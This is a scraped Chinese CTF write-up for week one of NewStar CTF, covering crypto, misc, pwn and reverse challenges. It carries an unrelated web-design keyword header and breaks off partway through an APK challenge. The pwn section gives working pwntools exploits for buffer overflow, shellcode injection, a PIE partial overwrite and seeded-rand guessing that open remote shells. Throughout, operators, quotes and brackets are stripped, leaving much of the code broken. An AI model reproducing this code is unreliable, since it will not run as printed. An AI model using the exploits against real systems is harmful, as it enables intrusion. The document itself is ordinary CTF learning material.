当前位置： 首页 > news >正文

福州网站运营,网站主服务器所在地地址,中职网络营销专业,做qq群头像网站最近没什么正式比赛#xff0c;都是入门赛#xff0c;有moectf,newstar,SHCTF,0xGame都是漫长的比赛。一周一堆制。 这周newstar第1周结束了#xff0c;据说py得很厉害#xff0c;第2周延期了#xff0c;什么时候开始还不一定#xff0c;不过第一周已经结束提交了#…最近没什么正式比赛都是入门赛有moectf,newstar,SHCTF,0xGame都是漫长的比赛。一周一堆制。 这周newstar第1周结束了据说py得很厉害第2周延期了什么时候开始还不一定不过第一周已经结束提交了可以发上来存下。总体来说没难题。 Crypto brainfuck [-].—-.—–.—–.—–.-……….——…….——-.-…–..—.-.-…——-… 直接到网站解密 Brainfuck/OoK加密解密 - Bugku CTF flag{Oiiaioooooiai#b7c0b1866fe58e12} Caesars Secert kqfl{hf3x4wx_h1umjw_n5_a4wd_3fed}  随波逐流工具一键解密 key1 #5: flag{ca3s4rs_c1pher_i5_v4ry_3azy} Fence fa{ereigtepanet6680}lgrodrn_h_litx#8fc3 同样随波W栅栏 flag{reordering_the_plaintext#686f8c03}  Vigenère pqcq{qc_m1kt4_njn_5slp0b_lkyacx_gcdy1ud4_g3nv5x0} 试密钥逐个字母试使头为flag也可以从 vigenere的表上查 flag{la_c1fr4_del_5ign0r_giovan_batt1st4_b3ll5s0}  babyencoding flag由3段组成第1段是base64,第2段是base32第3段是uuencode part 1 of flag: ZmxhZ3tkYXp6bGluZ19lbmNvZGluZyM0ZTBhZDQ part 2 of flag: MYYGGYJQHBSDCZJRMQYGMMJQMMYGGN3BMZSTIMRSMZSWCNY part 3 of flag: 8S4U,3DR8SDY,CS-F5F-C(S,SR-CQ9F8S87T  不过这个uuencode需要在 在线UUencode编码|在线UUencode解码|UU编码|UU解码|UUencode编码原理介绍–查错网  上解码随波上后部是乱码 flag{dazzling_encoding#4e0ad4f0ca08d1e1d0f10c0c7afe422fea7c55192c992036ef623372601ff3a} babyrsa n是由一堆小素数组成可以直接分解 from Crypto.Util.number import * from flag import flagdef gen_prime(n):res 1for i in range(15):res * getPrime(n)return resif name main:n gen_prime(32)e 65537m bytes_to_long(flag)c pow(m,e,n)print(n)print© n 17290066070594979571009663381214201320459569851358502368651245514213538229969915658064992558167323586895088933922835353804055772638980251328261 c 14322038433761655404678393568158537849783589481463521075694802654611048898878605144663750410655734675423328256213114422929994037240752995363595 在sage上直接得到phi phi euler_phi(n) d inverse_mod(0x10001, phi) m pow(c,d,n) l2b(int(m)) bflag{us4_s1ge_t0_cal_phI} Small d d很小直接用winer from secret import flag from Crypto.Util.number import p getPrime(1024) q getPrime(1024)d getPrime(32) e inverse(d, (p-1)(q-1)) n p*q m bytes_to_long(flag)c pow(m,e,n)print© print(e) print(n)c 6755916696778185952300108824880341673727005249517850628424982499865744864158808968764135637141068930913626093598728925195859592078242679206690525678584698906782028671968557701271591419982370839581872779561897896707128815668722609285484978303216863236997021197576337940204757331749701872808443246927772977500576853559531421931943600185923610329322219591977644573509755483679059951426686170296018798771243136530651597181988040668586240449099412301454312937065604961224359235038190145852108473520413909014198600434679037524165523422401364208450631557380207996597981309168360160658308982745545442756884931141501387954248 e 8614531087131806536072176126608505396485998912193090420094510792595101158240453985055053653848556325011409922394711124558383619830290017950912353027270400567568622816245822324422993074690183971093882640779808546479195604743230137113293752897968332220989640710311998150108315298333817030634179487075421403617790823560886688860928133117536724977888683732478708628314857313700596522339509581915323452695136877802816003353853220986492007970183551041303875958750496892867954477510966708935358534322867404860267180294538231734184176727805289746004999969923736528783436876728104351783351879340959568183101515294393048651825 n 19873634983456087520110552277450497529248494581902299327237268030756398057752510103012336452522030173329321726779935832106030157682672262548076895370443461558851584951681093787821035488952691034250115440441807557595256984719995983158595843451037546929918777883675020571945533922321514120075488490479009468943286990002735169371404973284096869826357659027627815888558391520276866122370551115223282637855894202170474955274129276356625364663165723431215981184996513023372433862053624792195361271141451880123090158644095287045862204954829998614717677163841391272754122687961264723993880239407106030370047794145123292991433#sage from Crypto.Util.number import long_to_bytes,bytes_to_long def transform(x,y):res []while y:res.append(x//y)x,y y,x%yreturn resdef continued_fraction(res):numerator,denominator 1,0for i in res[::-1]:denominator,numerator numerator,i*numeratordenominatorreturn numerator,denominatordef wiener_attack(c,res,n):print(Attack start…)for i in range(1,len(res)):ress res[:i]d continued_fraction(ress)[1]m long_to_bytes(int(pow(c,d,n)))#if all(0x20k0x7f for k in m):if bflag{ in m:print(m)breakres transform(e,n) wiener_attack(c,res,n)#Attack start… #bflag{learn_some_continued_fraction_technique#dc16885c} babyxor 1字节异或加密直接爆破 from secret import *ciphertext []for f in flag:ciphertext.append(f ^ key)print(bytes(ciphertext).hex())

e9e3eee8f4f7bffdd0bebad0fcf6e2e2bcfbfdf6d0eee1ebd0eabbf5f6aeaeaeaeaeaef2

enc bytes.fromhex(e9e3eee8f4f7bffdd0bebad0fcf6e2e2bcfbfdf6d0eee1ebd0eabbf5f6aeaeaeaeaeaef2) for i in range(256):tmp bytes([i^v for v in enc])if bflag in tmp:print(tmp)#flag{x0r_15_symm3try_and_e4zy!!!!!!} Affine 仿射密码 from flag import flag, keymodulus 256ciphertext []for f in flag:ciphertext.append((key[0]*f key[1]) % modulus)print(bytes(ciphertext).hex())# dd4388ee428bdddd5865cc66aa5887ffcca966109c66edcca920667a88312064因为两个key都很小可以直接用flag{头爆破出来 enc bytes.fromhex(dd4388ee428bdddd5865cc66aa5887ffcca966109c66edcca920667a88312064) for i in range(256):for j in range(256):if bytes([(i*vj)%256 for v in bflag{]) enc[:5]:print(i,j)a,b 17,23 flag
for i in range(len(enc)):for k in range(0x21,0x7f):if (a*k b)%256 enc[i]:flag chr(k)break print(flag) #flag{4ff1ne_c1pher_i5_very_3azy} babyaes from Crypto.Cipher import AES import os from flag import flag from Crypto.Util.number import *def pad(data):return data b.join([b\x00 for _ in range(0, 16 - len(data))])def main():flag_ pad(flag)key os.urandom(16) * 2iv os.urandom(16)print(bytes_to_long(key) ^ bytes_to_long(iv) ^ 1)aes AES.new(key, AES.MODE_CBC, iv)encflag aes.encrypt(flag)print(enc_flag)if name main:main() key有16*2字节iv只有16字节前部爆露可以得到key和iv然后直接解密 hint 3657491768215750635844958060963805125333761387746954618540958489914964573229 enc b]\xc1\xe5\x82/\x02\x7ft\xf1B\x8d\n\xc1\x95i key long_to_bytes(hint^1)[:16]*2 iv long_to_bytes(hint^1^bytes_to_long(key))aes AES.new(key, AES.MODE_CBC, iv) aes.decrypt(enc) #bfirsT_cry_Aes\x00\x00\x00 #flag{firsT_cry_Aes} MISC CyberChefs Secret 怀疑这是crypto过来的 M5YHEUTEKFBW6YJWKZGU44CXIEYUWMLSNJLTOZCXIJTWCZD2IZRVG4TJPBSGGWBWHFMXQTDFJNXDQTA 直接叫厨子 机密图片 一个图片是个二维码显然不是flag用StegSolver 流量鲨鱼  流量题用wireshark打开可以看到好多 http访问接协议排序找到可疑项 追踪http流得到密文 Wm14aFozdFhjbWt6TldnMGNtdGZNWE5mZFRVelpuVnNYMkkzTW1FMk1EazFNemRsTm4wSwo 上厨子点魔术棒两次 压缩包们  附件用010打开发现是zip文件少头改头为504b0304后部有base64的提示 解出提示是 I like six-digit numbers because they are very concise and easy to remember. 就是说6位数字密码爆破6位数字爆破报错说明压缩包密码方式有误用010修改下把0改为0 然后爆破密码得到flag 空白格  压缩包打开是个由空格和tab组成的空白文件把空格换成0tab换成1每行只取后8字符这里中间还都插着个1不知怎么出来的 a open(white.txt).readlines() flag
for v in a:v v[:-1].replace( , 0).replace(\t, 1)flag chr(int(v[-8:],2))print(flag.replace(chr(1),)) 隐秘的眼睛 显然是提到眼睛就是silenteye PWN ret2text  read有溢出直接写后门 from pwn import *p remote(node4.buuoj.cn,29584) context.log_level debugp.sendlineafter(bShow me your magic, b\x00*0x28 p64(0x4011fb)) print(p.sendline(bcat flag)) p.interactive() ezshellcode 建了个可写可执行的块把shellcode读进去然后执行 from pwn import *p remote(node4.buuoj.cn,29612) context(archamd64, log_level debug)p.sendlineafter(bShow me your magic, asm(shellcraft.sh())) print(p.sendline(bcat flag)) p.interactive() newstar shop 这题主要是看代码 一共有100块买gift花40两次再运行3 减50变成负数再买flag即可 输入1212313 int __cdecl __noreturn main(int argc, const char **argv, const char **envp) {int v3; // [rsp4h] [rbp-Ch] BYREFunsigned __int64 v4; // [rsp8h] [rbp-8h]v4 readfsqword(0x28u);init();while ( 1 ){menu();if ( (int)isoc99_scanf(%d, v3) 0 )puts(Invalid input);switch ( v3 ){case 1:shop();break;case 2:makemoney();break;case 3:dont_try();break;default:puts(nothing here);puts(\n);break;}} } unsigned __int64 shop() {int v1; // [rsp4h] [rbp-Ch] BYREFunsigned __int64 v2; // [rsp8h] [rbp-8h]v2 readfsqword(0x28u);puts();puts(Welcome to newstar shop);puts();puts(1.newstars gift 20\();puts(2.pwn write up 40\));puts(3.shell 9999$);puts(\n);puts(All things are only available for one day!);puts(What do you want to buy?);puts(\n);if ( (int)isoc99_scanf(%d, v1) 0 )puts(Invalid input);if ( v1 ! 3 ){if ( v1 3 ){ LABEL_17:puts(nothing here);puts(\n);return v2 - __readfsqword(0x28u);}if ( v1 1 ){if ( (unsigned int)money 0x13 ){money - 20;puts(You buy a newstars gift);puts(That is the gift:);puts(What will happen when int transfer to unsigned int?);goto LABEL_10;}}else{if ( v1 ! 2 )goto LABEL_17;if ( (unsigned int)money 0x27 ){money - 40;puts(You buy a pwn write up);puts(That is free after the match,haha);goto LABEL_10;}}puts(Sorry,you dont have enough money); LABEL_10:puts(\n);return v2 - __readfsqword(0x28u);}if ( (unsigned int)money 0x270E ){money 0;puts(How do you buy it?);puts(\n);system(/bin/sh);}else{puts(Sorry,you dont have enough money);puts(\n);}return v2 - readfsqword(0x28u); } p1eee 跟前边第1题类似read有溢出还有后门不过后门没直接给出 ssize_t sub_120E() {int64 buf[4]; // [rsp0h] [rbp-20h] BYREFmemset(buf, 0, sizeof(buf));puts(A nice try to break pie!!!);return read(0, buf, 0x29uLL); } 后门 from pwn import *p remote(node4.buuoj.cn,25970) context(archamd64, log_level debug)p.sendafter(bA nice try to break pie!!!, b\x00*0x28 p8(0x6c)) print(p.sendline(bcat flag)) p.interactive() Random 猜对一个数即可 int __cdecl main(int argc, const char **argv, const char **envp) {char v3; // blint v4; // eaxint v6; // [rsp4h] [rbp-2Ch] BYREFunsigned int seed; // [rsp8h] [rbp-28h]int v8; // [rspCh] [rbp-24h]_BYTE v9[5]; // [rsp13h] [rbp-1Dh] BYREFunsigned __int64 v10; // [rsp18h] [rbp-18h]v10 readfsqword(0x28u);init(argc, argv, envp);seed time(0LL);srand(seed);v8 rand();puts(can you guess the number?);isoc99_scanf(%d, v6);if ( v8 v6 ){qmemcpy(v9, 2$031, sizeof(v9));v3 v9[rand() % 5];v4 rand();sy(v9[v4 % 2], v3);}else{printf(%s, Haha you are wrong);}return 0; } 用ctypes库猜一个数 from ctypes import * from pwn import *clibc cdll.LoadLibrary(/home/kali/glibc/libs/2.27-3ubuntu1.6_amd64/libc-2.27.so)p remote(node4.buuoj.cn,26584) context(archamd64, log_level debug)clibc.srand(clibc.time(0)) v clibc.rand()p.sendlineafter(bcan you guess the number?, str(v).encode())p.sendline(b/bin/sh) p.sendline(bcat flag)p.interactive() REVERSE easy_RE IDA一打开就看到一半 再反编译又是一半 咳 加密方法就是加1 a bgmbh|D1ohsbuv2bu21ot1oQb332ohUifG2stuQ[HBMBYZ2fwf2~bytes([v-1 for v in a]) bflag{C0ngratu1at10ns0nPa221ngTheF1rstPZGALAXY1eve1} Segments 根据题目名字查看段 ELF 第二步是base64 int cdecl main(int argc, const char **argv, const char **envp) {int v3; // edxchar *s1; // [rsp0h] [rbp-20h]char *v6; // [rsp8h] [rbp-18h]char *s; // [rsp10h] [rbp-10h]s (char *)malloc(0x64uLL);printf(Input flag: );fgets(s, 100, stdin);s[strcspn(s, \n)] 0;v6 encode(s);v3 strlen(v6);s1 base64_encode((int64)v6, v3);if ( !strcmp(s1, VlxRV2t0II8kX2WPJ15fZ49nWFEnj3V8do8hYy9t) )puts(Correct);elseputs(Wrong);free(v6);free(s1);free(s);return 0; } 第1步encode是与0x20异或 _BYTE *__fastcall encode(const char *a1) {size_t v1; // raxint v2; // eax_BYTE *v4; // [rsp20h] [rbp-20h]int i; // [rsp28h] [rbp-18h]int v6; // [rsp2Ch] [rbp-14h]v1 strlen(a1);v4 malloc(2 * v1 1);v6 0;for ( i 0; i strlen(a1); i ){v2 v6;v4v2 16;}v4[v6] 0;return v4; } a VlxRV2t0II8kX2WPJ15fZ49nWFEnj3V8do8hYy9t b b64decode(a) bytes([(v-16)^0x20 for v in b]) bflag{D0_4ou_7now_wha7_ELF_1s?} Endian 这是大端小端的意思 int __cdecl main(int argc, const char **argv, const char **envp) {int i; // [rsp4h] [rbp-3Ch]char *v5; // [rsp8h] [rbp-38h]char v6[40]; // [rsp10h] [rbp-30h] BYREFunsigned __int64 v7; // [rsp38h] [rbp-8h]v7 readfsqword(0x28u);puts(please input your flag);isoc99_scanf(%s, v6);v5 v6;for ( i 0; i 4; i ){if ( *(_DWORD )v5 ! (array[i] ^ 0x12345678) ){printf(wrong!);exit(0);}v5 4;}printf(you are right);return 0; } 加密只是作了个异或 enc [0x75553A1E, 0x7B583A03, 0x4D58220C, 0x7B50383D, 0x736B3819]a [0x12345678 ^ v for v in enc]a [1734437990, 1768713339, 1600943220, 1768189509, 1633644129]long_to_bytes(a[0]) bgalffrom pwn import p32b.join(p32(v) for v in a) bflag{llittl_Endian_aAndroXor 用jadx打开可以看到密文key异或 public class MainActivity extends AppCompatActivity {private ActivityMainBinding binding;static {System.loadLibrary(androxor);}public String Xor(String str, String str2) {char[] cArr {14, \r, 17, 23, 2, K, I, 7, , 30, 20, I, \n, 2, \f, , (, , 11, \, K, Y, 25, A, \r};char[] cArr2 new char[str.length()];String str3 str.length() ! 25 ? wrong!!! : you win!!!;for (int i 0; i str.length(); i) {char charAt (char) (str.charAt(i) ^ str2.charAt(i % str2.length()));cArr2[i] charAt;if (cArr[i] ! charAt) {return wrong!!!;}}return str3;}/ JADX INFO: Access modifiers changed from: protected */Override // androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, androidx.core.app.ComponentActivity, android.app.Activitypublic void onCreate(Bundle bundle) {super.onCreate(bundle);ActivityMainBinding inflate ActivityMainBinding.inflate(getLayoutInflater());this.binding inflate;setContentView(inflate.getRoot());final EditText editText (EditText) findViewById(R.id.password);((Button) findViewById(R.id.button)).setOnClickListener(new View.OnClickListener() { // from class: com.chick.androxor.MainActivity.1Override // android.view.View.OnClickListenerpublic void onClick(View view) {String obj editText.getText().toString();MainActivity mainActivity MainActivity.this;Toast.makeText(mainActivity, mainActivity.Xor(obj, happyx3), 1).show();Log.d(输入, editText.getText().toString());}});} } c [14,ord(\r), 17, 23, 2, ord(K), ord(I), ord(7), ord( ), 30, 20, ord(I), ord(\n), 2, ord(\f), ord(), ord((), ord(), 11, ord(), ord(K), ord(Y), 25, ord(A), ord(\r)] key bhappyx3xor(bytes©,key) #flag{3z_And0r1d_X0r_x1x1} EzPE 又是下异或这是第1个字符是序号和第2个异或 enc bytes.fromhex(0A0C041F266C432D3C0C544C24251106053A7C51381A030D01361F122604685D3F2D372A7D) flag f for i in range(len(enc)):for k in range(0x20,0x7f):if ord(flag[i])^k^i enc[i]:flag chr(k)break #flag{Y0u_kn0w_what_1s_PE_File_F0rmat} lazy_activtiy 又是个APK文件从程序里看点击够10000就出flag 这里的editText就是flag 打开layout找到用户定义的资源